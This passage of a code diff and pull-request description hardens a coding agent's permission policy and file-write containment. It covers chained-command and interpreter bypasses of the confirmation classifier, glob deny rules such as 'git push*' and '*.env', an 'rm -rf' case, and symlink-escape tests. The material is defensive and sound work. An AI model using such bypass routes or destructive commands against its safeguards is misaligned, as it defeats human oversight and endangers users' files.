+    assert Policy(deny=["git push*"]).decide("git status") == "ask"
+    assert Policy(deny=["*.env"]).decide("write to config/.env") == "deny"
+    assert Policy(allow=["*rm -rf*"]).decide("run: rm -rf build") == "allow"
+
+
 def test_make_confirm_wraps_ask():
     asked = []
 

--- a/tests/test_permissions.py
+++ b/tests/test_permissions.py
@@ -107,3 +107,11 @@ def test_load_policy_from_opendot_md(tmp_path):
     p = load_policy(str(tmp_path))
     assert p.allow == ["pytest"]
     assert p.deny == ["git push"]
+
+
+def test_glob_matches_indented_prompt_line():
+    # Confirm prompts indent the command; a glob deny must still match it, or the
+    # rule is silently bypassed.
+    prompt = "This command may not be undoable:\n  git push origin main\nRun it?"
+    assert Policy(deny=["git push*"]).decide(prompt) == "deny"
+    assert Policy(deny=["git push*"]).decide("This runs:\n  git status\n") == "ask"

--- a/tests/test_tools.py
+++ b/tests/test_tools.py
@@ -674,3 +674,90 @@ def test_run_shell_positive_timeout_argument_still_enforced(tmp_path):
     tb, wd, _ = _tb(tmp_path)
     out = tb.call("run_shell", {"command": "sleep 2", "timeout": 1})
     assert "timed out after 1s" in out
+
+
+def test_write_file_does_not_follow_symlink_out_of_workspace(tmp_path):
+    """In-workspace writes use open-time containment (O_NOFOLLOW), so if the
+    target path is a symlink pointing outside — including one swapped in after a
+    path check (TOCTOU) — the write does not follow it. The symlink is replaced
+    by a real in-workspace file instead. (#130)"""
+    tb, wd, _ = _tb(tmp_path)
+    outside = tmp_path / "outside_secret"
+    outside.write_text("ORIGINAL", encoding="utf-8")
+    target = wd / "notes.txt"
+    os.symlink(outside, target)
+
+    tb._safe_write_within_workspace(target, "NEW")
+
+    assert outside.read_text() == "ORIGINAL"  # never written through the symlink
+    assert not target.is_symlink()  # replaced by a real file
+    assert target.read_text() == "NEW"
+
+
+def test_write_file_normal_in_workspace_still_works(tmp_path):
+    tb, wd, _ = _tb(tmp_path)
+    out = tb.call("write_file", {"path": "sub/dir/file.txt", "content": "hi"})
+    assert "created" in out
+    assert (wd / "sub" / "dir" / "file.txt").read_text() == "hi"
+
+
+def test_openat2_tier_used_when_supported(tmp_path):
+    """On a Linux kernel with openat2, the strongest containment tier does a
+    normal write successfully (feature-detected; skipped elsewhere)."""
+    from opendot.tools.local import _openat2_supported, _write_via_openat2
+
+    if not _openat2_supported():
+        pytest.skip("openat2 not available on this platform")
+    wd = tmp_path / "ws"
+    wd.mkdir()
+    p = wd / "file.txt"
+    assert _write_via_openat2(str(wd), p, b"hello") is True
+    assert p.read_text() == "hello"
+
+
+def test_openat2_refuses_symlink_escape_when_supported(tmp_path):
+    """openat2 with RESOLVE_NO_SYMLINKS returns False for a symlinked target
+    (escape refused), so the caller falls back and neutralises it."""
+    from opendot.tools.local import _openat2_supported, _write_via_openat2
+
+    if not _openat2_supported():
+        pytest.skip("openat2 not available on this platform")
+    wd = tmp_path / "ws"
+    wd.mkdir()
+    outside = tmp_path / "outside"
+    outside.write_text("ORIGINAL", encoding="utf-8")
+    link = wd / "link.txt"
+    os.symlink(outside, link)
+    assert _write_via_openat2(str(wd), link, b"NEW") is False
+    assert outside.read_text() == "ORIGINAL"
+
+
+def test_write_refuses_intermediate_symlink_escape(tmp_path):
+    """An intermediate path component that is a symlink pointing outside the
+    workspace must not be followed — the write stays inside, the symlinked dir is
+    replaced by a real one. Closes the intermediate-symlink race on every tier
+    (not just Linux openat2). (#130)"""
+    tb, wd, _ = _tb(tmp_path)
+    outside_dir = tmp_path / "attacker_dir"
+    outside_dir.mkdir()
+    (wd / "sub").symlink_to(outside_dir)  # wd/sub -> outside
+
+    tb._safe_write_within_workspace(wd / "sub" / "data.txt", "NEW")
+
+    assert not (outside_dir / "data.txt").exists()  # never escaped
+    assert not (wd / "sub").is_symlink()  # symlinked component replaced by real dir
+    assert (wd / "sub" / "data.txt").read_text() == "NEW"
+
+
+def test_plain_verified_refuses_intermediate_symlink(tmp_path):
+    """The dir_fd-less fallback (Windows path) also refuses an intermediate
+    symlink escape, not just the POSIX fd-walk."""
+    tb, wd, _ = _tb(tmp_path)
+    outside_dir = tmp_path / "attacker_dir2"
+    outside_dir.mkdir()
+    (wd / "sub").symlink_to(outside_dir)
+
+    tb._write_plain_verified(wd / "sub" / "data.txt", b"NEW")
+
+    assert not (outside_dir / "data.txt").exists()
+    assert (wd / "sub" / "data.txt").read_text() == "NEW"

--- a/tests/test_tools.py
+++ b/tests/test_tools.py
@@ -761,3 +761,11 @@ def test_plain_verified_refuses_intermediate_symlink(tmp_path):
 
     assert not (outside_dir / "data.txt").exists()
     assert (wd / "sub" / "data.txt").read_text() == "NEW"
+
+
+def test_write_outside_workspace_via_plain_path_raises(tmp_path):
+    """The dir_fd-less fallback raises on a refusal (path not under workspace)
+    instead of silently returning, so write_file can't report a false success."""
+    tb, wd, _ = _tb(tmp_path)
+    with pytest.raises(OSError):
+        tb._write_plain_verified(tmp_path / "outside.txt", b"x")


### PR DESCRIPTION
Fixes the three classifier/permission issues from the launch-thread review, and bumps to 0.3.2.

## Fixed

### Chained commands bypassing confirmation (#128)
The classifier keyed off the first word only, so `echo hi && sudo reboot` auto-ran. It now splits a command line into segments on shell operators (`&&`, `||`, `;`, `|`, newline — quote-aware) and classifies each; the line is reversible only if every segment is, and the first escaping segment supplies the reason.

### Opaque interpreters auto-running (#130, classifier part)
`python`, `node`, `bash`, `sh`, `make`, `docker`, `kubectl`, `go`, `cargo` moved out of the auto-run set to confirm-first — `python script.py` is exactly as opaque as `python -c`.

### Substring pattern matching (#129)
`--allow`/`--deny` matched raw substrings, so `deny rm` also blocked "refo**rm**at" and `allow test` matched "la**test**". Now patterns match on word boundaries, or as an `fnmatch` glob when they contain `*`/`?`/`[` (`git push*`, `*.env`).

### Open-time file-write containment (#130, hardening part)
Built-in `write_file` now refuses to follow a symlink at **any** path component (final or intermediate), so a symlinked/swapped path can't redirect a write outside the snapshot boundary — the TOCTOU cases a text path-check can't close. Layered by platform:
- **Linux openat2** → `RESOLVE_BENEATH | RESOLVE_NO_SYMLINKS` (atomic, race-free; ctypes-bound, feature-detected).
- **Any POSIX with dir_fd** (macOS/BSD, older Linux) → component-by-component `openat` walk with `O_NOFOLLOW`, anchoring each open to the previous fd, so no intermediate symlink is followed either.
- **Windows / no dir_fd** → rebuild each component as a real dir (replacing an escaping symlink), then write.

An escaping component is replaced by a real in-workspace file/dir; outside-workspace writes are unchanged (already confirmed + recorded irreversible).

## Not in this PR
#130's **sandbox / overlay** direction (the strong architectural answer) remains open — this PR does the shippable classifier + open-time hardening; the sandbox mode is still tracked there.

## Testing
- 329 passed, 5 skipped (2 are Linux-openat2 smoke tests that skip on other platforms).
- `ruff check` + `ruff format --check` clean.
- New tests: per-segment classification, opaque-interpreter confirm-first, word-boundary + glob matching, final- and intermediate-symlink write containment on both the fd-walk and plain tiers.

Closes #128, closes #129.